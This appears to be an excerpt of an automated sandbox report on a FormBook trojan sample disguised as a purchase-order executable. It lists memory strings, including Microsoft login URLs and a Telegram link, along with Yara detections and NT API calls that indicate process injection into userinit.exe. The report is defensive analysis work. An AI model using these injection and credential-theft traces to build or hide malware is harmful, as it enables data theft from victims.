            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: userinit.exe, 00000008.00000003.1997730127.0000000007C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: userinit.exe, 00000008.00000002.3309629931.0000000003E96000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.00000000036E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000038536000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/AG09999
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004028000.00000004.10000000.00040000.00000000.sdmp, userinit.exe, 00000008.00000002.3311803210.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309629931.0000000004802000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003878000.00000004.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000004052000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0042C283 NtClose,3_2_0042C283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512B60 NtClose,LdrInitializeThunk,3_2_01512B60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01512DF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01512C70
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015135C0 NtCreateMutant,LdrInitializeThunk,3_2_015135C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01514340 NtSetContextThread,3_2_01514340
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01514650 NtSuspendThread,3_2_01514650
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512BF0 NtAllocateVirtualMemory,3_2_01512BF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512BE0 NtQueryValueKey,3_2_01512BE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512B80 NtQueryInformationFile,3_2_01512B80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512BA0 NtEnumerateValueKey,3_2_01512BA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512AD0 NtReadFile,3_2_01512AD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512AF0 NtWriteFile,3_2_01512AF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512AB0 NtWaitForSingleObject,3_2_01512AB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512D10 NtMapViewOfSection,3_2_01512D10
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512D00 NtSetInformationFile,3_2_01512D00
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512D30 NtUnmapViewOfSection,3_2_01512D30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512DD0 NtDelayExecution,3_2_01512DD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512DB0 NtEnumerateKey,3_2_01512DB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512C60 NtCreateKey,3_2_01512C60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512C00 NtQueryInformationProcess,3_2_01512C00
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512CC0 NtQueryVirtualMemory,3_2_01512CC0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512CF0 NtOpenProcess,3_2_01512CF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512CA0 NtQueryInformationToken,3_2_01512CA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512F60 NtCreateProcessEx,3_2_01512F60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512F30 NtCreateSection,3_2_01512F30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512FE0 NtCreateFile,3_2_01512FE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512F90 NtProtectVirtualMemory,3_2_01512F90
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512FB0 NtResumeThread,3_2_01512FB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512FA0 NtQuerySection,3_2_01512FA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512E30 NtWriteVirtualMemory,3_2_01512E30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512EE0 NtQueueApcThread,3_2_01512EE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512E80 NtReadVirtualMemory,3_2_01512E80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512EA0 NtAdjustPrivilegesToken,3_2_01512EA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513010 NtOpenDirectoryObject,3_2_01513010
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513090 NtSetValueKey,3_2_01513090
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015139B0 NtGetContextThread,3_2_015139B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513D70 NtOpenThread,3_2_01513D70
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513D10 NtOpenProcessToken,3_2_01513D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03364340 NtSetContextThread,LdrInitializeThunk,8_2_03364340
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03364650 NtSuspendThread,LdrInitializeThunk,8_2_03364650
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362B60 NtClose,LdrInitializeThunk,8_2_03362B60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03362BA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03362BF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03362BE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362AF0 NtWriteFile,LdrInitializeThunk,8_2_03362AF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362AD0 NtReadFile,LdrInitializeThunk,8_2_03362AD0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362F30 NtCreateSection,LdrInitializeThunk,8_2_03362F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362FB0 NtResumeThread,LdrInitializeThunk,8_2_03362FB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362FE0 NtCreateFile,LdrInitializeThunk,8_2_03362FE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03362E80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03362EE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03362D30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03362D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03362DF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362DD0 NtDelayExecution,LdrInitializeThunk,8_2_03362DD0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03362C70
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362C60 NtCreateKey,LdrInitializeThunk,8_2_03362C60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03362CA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033635C0 NtCreateMutant,LdrInitializeThunk,8_2_033635C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033639B0 NtGetContextThread,LdrInitializeThunk,8_2_033639B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362B80 NtQueryInformationFile,8_2_03362B80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362AB0 NtWaitForSingleObject,8_2_03362AB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362F60 NtCreateProcessEx,8_2_03362F60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362FA0 NtQuerySection,8_2_03362FA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362F90 NtProtectVirtualMemory,8_2_03362F90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362E30 NtWriteVirtualMemory,8_2_03362E30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362EA0 NtAdjustPrivilegesToken,8_2_03362EA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362D00 NtSetInformationFile,8_2_03362D00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362DB0 NtEnumerateKey,8_2_03362DB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362C00 NtQueryInformationProcess,8_2_03362C00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362CF0 NtOpenProcess,8_2_03362CF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362CC0 NtQueryVirtualMemory,8_2_03362CC0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363010 NtOpenDirectoryObject,8_2_03363010
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363090 NtSetValueKey,8_2_03363090
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363D10 NtOpenProcessToken,8_2_03363D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363D70 NtOpenThread,8_2_03363D70
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC8D90 NtCreateFile,8_2_00AC8D90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC8F00 NtReadFile,8_2_00AC8F00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC90B0 NtClose,8_2_00AC90B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC9000 NtDeleteFile,8_2_00AC9000
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC9210 NtAllocateVirtualMemory,8_2_00AC9210
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 0_2_0158D5DC0_2_0158D5DC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004182133_2_00418213
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0042E8E33_2_0042E8E3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0040FA413_2_0040FA41
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0040FA433_2_0040FA43
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004012603_2_00401260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004023D03_2_004023D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004163EE3_2_004163EE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004163F33_2_004163F3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0040FC633_2_0040FC63
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004014E03_2_004014E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0040DCE33_2_0040DCE3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_00402F503_2_00402F50
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_004027303_2_00402730
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015681583_2_01568158
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D01003_2_014D0100
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157A1183_2_0157A118
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015981CC3_2_015981CC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A01AA3_2_015A01AA
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015941A23_2_015941A2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015720003_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159A3523_2_0159A352
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A03E63_2_015A03E6
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F03_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015802743_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015602C03_2_015602C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E05353_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A05913_2_015A0591
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015924463_2_01592446
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015844203_2_01584420
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158E4F63_2_0158E4F6
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015047503_2_01504750
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E07703_2_014E0770
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DC7C03_2_014DC7C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FC6E03_2_014FC6E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F69623_2_014F6962
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E29A03_2_014E29A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015AA9A63_2_015AA9A6
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E28403_2_014E2840
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EA8403_2_014EA840
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E8F03_2_0150E8F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C68B83_2_014C68B8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159AB403_2_0159AB40
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01596BD73_2_01596BD7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DEA803_2_014DEA80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157CD1F3_2_0157CD1F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EAD003_2_014EAD00
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DADE03_2_014DADE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F8DBF3_2_014F8DBF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0C003_2_014E0C00
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D0CF23_2_014D0CF2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580CB53_2_01580CB5
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01554F403_2_01554F40
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01500F303_2_01500F30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01582F303_2_01582F30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01522F283_2_01522F28
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2FC83_2_014D2FC8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014ECFE03_2_014ECFE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155EFA03_2_0155EFA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0E593_2_014E0E59
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159EE263_2_0159EE26
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159EEDB3_2_0159EEDB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159CE933_2_0159CE93
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F2E903_2_014F2E90
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015AB16B3_2_015AB16B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151516C3_2_0151516C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CF1723_2_014CF172
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EB1B03_2_014EB1B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E70C03_2_014E70C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158F0CC3_2_0158F0CC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015970E93_2_015970E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159F0E03_2_0159F0E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CD34C3_2_014CD34C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159132D3_2_0159132D
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0152739A3_2_0152739A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FB2C03_2_014FB2C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015812ED3_2_015812ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E52A03_2_014E52A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015975713_2_01597571
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157D5B03_2_0157D5B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D14603_2_014D1460
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159F43F3_2_0159F43F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159F7B03_2_0159F7B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015256303_2_01525630
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015916CC3_2_015916CC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E99503_2_014E9950
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FB9503_2_014FB950
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015759103_2_01575910
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0154D8003_2_0154D800
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E38E03_2_014E38E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159FB763_2_0159FB76
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01555BF03_2_01555BF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0151DBF93_2_0151DBF9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FFB803_2_014FFB80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159FA493_2_0159FA49
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01597A463_2_01597A46
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01553A6C3_2_01553A6C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158DAC63_2_0158DAC6
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01525AA03_2_01525AA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157DAAC3_2_0157DAAC
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01581AA33_2_01581AA3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01591D5A3_2_01591D5A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E3D403_2_014E3D40
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01597D733_2_01597D73
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FFDC03_2_014FFDC0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01559C323_2_01559C32
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159FCF23_2_0159FCF2
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159FF093_2_0159FF09
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E1F923_2_014E1F92
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159FFB13_2_0159FFB1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E9EB03_2_014E9EB0
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A6B7927_2_05A6B792
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4C8F07_2_05A4C8F0
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4C8F27_2_05A4C8F2
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4AB927_2_05A4AB92
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A4CB127_2_05A4CB12
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A532A27_2_05A532A2
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exeCode function: 7_2_05A5329D7_2_05A5329D
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EA3528_2_033EA352
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333E3F08_2_0333E3F0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033F03E68_2_033F03E6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D02748_2_033D0274
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033B02C08_2_033B02C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CA1188_2_033CA118
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033201008_2_03320100
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033B81588_2_033B8158
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033F01AA8_2_033F01AA
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E81CC8_2_033E81CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033C20008_2_033C2000
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033307708_2_03330770
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033547508_2_03354750
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0332C7C08_2_0332C7C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334C6E08_2_0334C6E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033305358_2_03330535
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033F05918_2_033F0591
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D44208_2_033D4420
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E24468_2_033E2446
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033DE4F68_2_033DE4F6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EAB408_2_033EAB40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E6BD78_2_033E6BD7
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0332EA808_2_0332EA80
